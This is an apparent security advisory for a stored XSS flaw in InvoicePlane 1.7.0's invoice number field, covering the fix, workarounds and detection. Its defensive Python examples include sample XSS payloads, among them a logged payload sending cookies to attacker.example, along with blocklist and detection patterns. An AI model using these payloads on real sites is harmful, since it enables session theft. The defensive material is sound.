CVE-2026-24744
📋 TL;DR
InvoicePlane 1.7.0 contains a stored cross-site scripting (XSS) vulnerability in the Edit Invoices function: the invoice_number parameter is saved without input validation and rendered back into pages without encoding. An authenticated administrator can store a script payload in an invoice number that then executes in the browser of every other user who views that invoice, letting the attacker act in the application as those users. Only InvoicePlane 1.7.0 is affected; the fix is in 1.7.1.
💻 Affected Systems
- InvoicePlane 1.7.0 (fixed in 1.7.1)
📦 What is this software?
InvoicePlane is an open-source, self-hosted invoicing and quoting application written in PHP, developed by the InvoicePlane project.
⚠️ Risk & Real-World Impact
Worst Case
An attacker with administrator access plants a persistent script in an invoice number. Every user who views that invoice runs the script in their own browser session, so it can steal session cookies (where the session cookie is not HttpOnly), perform actions in the application as the viewing user, redirect victims to phishing pages or, when the viewer is another administrator, change settings and accounts to establish persistent access to the application.
Likely Case
A malicious administrator, or an attacker who has taken over an admin account, injects a script that captures session data or invoice and client details from other users who view the invoice, moving from one compromised account to others or exfiltrating financial data.
If Mitigated
With the fix applied (input validation plus output encoding of the invoice number), the vulnerability is eliminated. Restricting administrator access to a small, trusted group behind multi-factor authentication reduces the chance of exploitation, and least-privilege accounts for ordinary users limit what a stolen session can do.
🎯 Exploit Status
Exploitation requires administrator privileges. Once an attacker has them, the vulnerability is straightforward to exploit through the normal Edit Invoices form; no special tooling is required.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.7.1
Vendor Advisory: https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-5mxx-553h-m62w
Restart Required: No
Instructions:
1. Back up the InvoicePlane installation files and database.
2. Download InvoicePlane 1.7.1 from the official repository.
3. Replace the existing installation files with the new version.
4. Clear browser caches and test invoice editing and viewing.
🔧 Temporary Workarounds
Input Validation and Output Encoding
Add a custom check that rejects invoice_number values outside the format your numbering scheme actually uses (for example letters, digits and a few separators) before they are saved.
In the templates that print invoice_number, HTML-entity-encode the value at output (htmlspecialchars with ENT_QUOTES in PHP) so that angle brackets and quotes are rendered as literal text. Output encoding is the control that actually stops the script from running; the input check is defence in depth.
Content Security Policy
Deploy a strict CSP to reduce the impact of any XSS payload that does get stored.
Add a Content-Security-Policy response header with a script-src 'self' directive (and no 'unsafe-inline'), which stops the browser from running inline script injected into a page. Test in a staging copy first: the same directive also blocks the application's own inline scripts, so parts of the UI may need adjustment, and adding 'unsafe-inline' to make them work would cancel the protection.
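The following Python snippet is an added illustration of the two halves of this workaround, the allowlist check on input and entity encoding at output; it is not InvoicePlane's code (InvoicePlane is written in PHP), and the invoice-number format, the row template and the field names are assumptions. The parser-based check at the end shows why the encoding must cover attribute contexts as well as the angle brackets of element content.

```python
"""Allowlist validation plus output encoding for an invoice number field.

Added illustration in Python; InvoicePlane itself is PHP and this is not its
code. The render functions stand in for a template that prints invoice_number
both as cell text and inside an attribute.
"""
import html
import re
from html.parser import HTMLParser

# Assumed legitimate invoice-number format: letters, digits, a few separators.
INVOICE_NUMBER_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9 ._/-]{0,63}$')


def is_valid_invoice_number(value):
    """Input-side defence in depth: accept only the allowlisted shape."""
    return INVOICE_NUMBER_RE.match(value) is not None


def render_row_vulnerable(invoice_number):
    """Untrusted value written straight into HTML: the stored-XSS pattern."""
    return (f'<tr><td>{invoice_number}</td>'
            f'<td><a href="/invoices/view" title="{invoice_number}">view</a></td></tr>')


def render_row_hardened(invoice_number):
    """Entity-encode at output for both the text and the attribute context.

    quote=True also encodes " and ', which is what stops a value from closing
    the title attribute and adding its own on* handler; encoding only < and >
    would leave that route open.
    """
    safe = html.escape(invoice_number, quote=True)
    return (f'<tr><td>{safe}</td>'
            f'<td><a href="/invoices/view" title="{safe}">view</a></td></tr>')


class ActiveContentFinder(HTMLParser):
    """Collects script elements and on* event-handler attributes the way a
    browser would interpret the markup. A substring search cannot tell an
    encoded on* sitting inside a quoted attribute value from a live one."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append(("tag", tag))
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.hits.append(("attr", name))


def active_content(fragment):
    """Return the script tags and event handlers a browser would execute."""
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    for payload in ['<script>alert(1)</script>', '" onmouseover="alert(1)']:
        print("valid input? ", is_valid_invoice_number(payload))
        print("vulnerable:  ", active_content(render_row_vulnerable(payload)))
        print("hardened:    ", active_content(render_row_hardened(payload)))
```

The second payload never uses an angle bracket: it closes the title attribute and adds an onmouseover handler, which is exactly what a fix that only encodes < and > would miss.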
🧯 If You Can't Patch
- Restrict administrator accounts to trusted personnel, enforce multi-factor authentication on them, and review the list of admin accounts for any you do not recognise
- Add web application firewall rules that block or alert on invoice_number values containing script tags, on* event-handler attributes or javascript: URLs; treat this as defence in depth only, since blocklist rules are bypassed by encoding tricks and less common payload forms
🔍 How to Verify
Check if Vulnerable:
Confirm the running version in the application footer or on the system settings page; if it is 1.7.0, the installation is vulnerable.
Check Version:
Application footer or system settings page in the InvoicePlane web interface.
Verify Fix Applied:
After upgrading to 1.7.1, save an invoice in a test or staging installation whose number contains a harmless marker such as <b>test</b>, then open the invoice list and the invoice view and confirm the marker is shown as literal text rather than rendered as HTML.
📡 Detection & Monitoring
Log Indicators:
- invoice_number values in request logs containing script tags, on* event-handler attributes or javascript: URLs, in literal or URL-encoded form (for example %3Cscript%3E); standard access logs do not record POST bodies, so this needs WAF or application-level request logging
- Repeated failed logins followed by a successful administrator login, which may indicate a compromised admin account being used to plant the payload
Network Indicators:
- Requests from users' browsers to unexpected external hosts immediately after viewing invoices (the injected script runs in the victim's browser, so any exfiltration traffic originates from the client, not from the InvoicePlane server)
- Script-like payloads in the bodies of HTTP POST requests to the invoice editing endpoints
SIEM Query:
source="web_server" AND (uri_path="/invoices/edit" OR uri_path LIKE "/invoices/%/edit") AND param="invoice_number" AND (value CONTAINS "<script" OR value CONTAINS "%3Cscript" OR value CONTAINS "javascript:" OR value CONTAINS "onerror=" OR value CONTAINS "onmouseover=")
Pseudo-syntax; adapt it to your SIEM. Keep all value tests inside one group so they are scoped to invoice_number, match the URL-encoded forms as well as the literal ones, and compare case-insensitively.
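As an added example, not part of this advisory or of any real SIEM, the following Python script applies the same detection logic to constructed request-log lines. Ordinary web-server access logs do not record POST bodies, so the log format, the index.php route prefix and the numeric invoice id in the path are all assumptions about what a WAF or application-level request logger would capture. It URL-decodes the form body before matching, and it also flags values that fail an allowlist, which catches double-encoded payloads the blocklist misses.

```python
"""Scan request logs for script-like values in InvoicePlane's invoice_number field.

Added illustration, not InvoicePlane code or a real SIEM rule. Ordinary access
logs omit POST bodies, so the assumed log format below is what a WAF or an
application-level request logger would record:
    client_ip method path "url-encoded form body" status
"""
import re
from urllib.parse import parse_qs

# Constructed sample lines (not from a real deployment). The index.php prefix
# and the numeric invoice id in the path are assumptions about the route.
SAMPLE_LOG = """\
10.0.0.5 POST /index.php/invoices/edit/12 "invoice_number=INV-2026-0042&invoice_date_created=2026-01-10" 302
10.0.0.9 POST /index.php/invoices/edit/12 "invoice_number=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E" 302
10.0.0.9 POST /index.php/invoices/edit/13 "invoice_number=INV-0043%22%20onmouseover%3D%22alert(1)" 302
10.0.0.7 POST /index.php/invoices/edit/14 "invoice_number=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" 302
10.0.0.7 POST /index.php/invoices/edit/14 "invoice_number=%253Cscript%253Ealert(1)%253C%2Fscript%253E" 302
10.0.0.5 GET /index.php/invoices/view/12 "" 200
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) "(?P<body>[^"]*)" (?P<status>\d{3})$')

# Edit routes in the two shapes this page names, with the assumed prefix and id.
EDIT_PATH_RE = re.compile(r'^(?:/index\.php)?/invoices/(?:edit(?:/\d+)?|\d+/edit)$')

# Blocklist of common injection markers, applied after one round of URL decoding.
XSS_MARKERS = re.compile(r'<\s*/?\s*script|javascript\s*:|\bon\w+\s*=', re.IGNORECASE)

# Allowlist of what a legitimate invoice number looks like (assumed format).
ALLOWED_INVOICE_NUMBER = re.compile(r'^[A-Za-z0-9][A-Za-z0-9 ._/-]{0,63}$')


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    match = LINE_RE.match(line)
    return match.groupdict() if match else None


def classify(value):
    """Return why a decoded invoice_number is suspicious, or None if it looks clean."""
    if XSS_MARKERS.search(value):
        return "script marker"
    if not ALLOWED_INVOICE_NUMBER.match(value):
        # Catches double-encoded or otherwise obfuscated payloads the blocklist misses.
        return "outside allowlist"
    return None


def scan_log(text):
    """Findings for POSTs to invoice-edit routes whose invoice_number is suspicious."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not EDIT_PATH_RE.match(rec["path"]):
            continue
        # parse_qs percent-decodes the body and returns each parameter's values as a list.
        for value in parse_qs(rec["body"]).get("invoice_number", []):
            reason = classify(value)
            if reason:
                findings.append({"ip": rec["ip"], "path": rec["path"],
                                 "value": value, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} [{f['reason']}] {f['value']!r}")
```

Against the sample the three literal payloads are caught by the blocklist, while the double-encoded one passes the blocklist and is caught only because a real invoice number never contains a percent sign. Tune the allowlist to your own numbering scheme before relying on it.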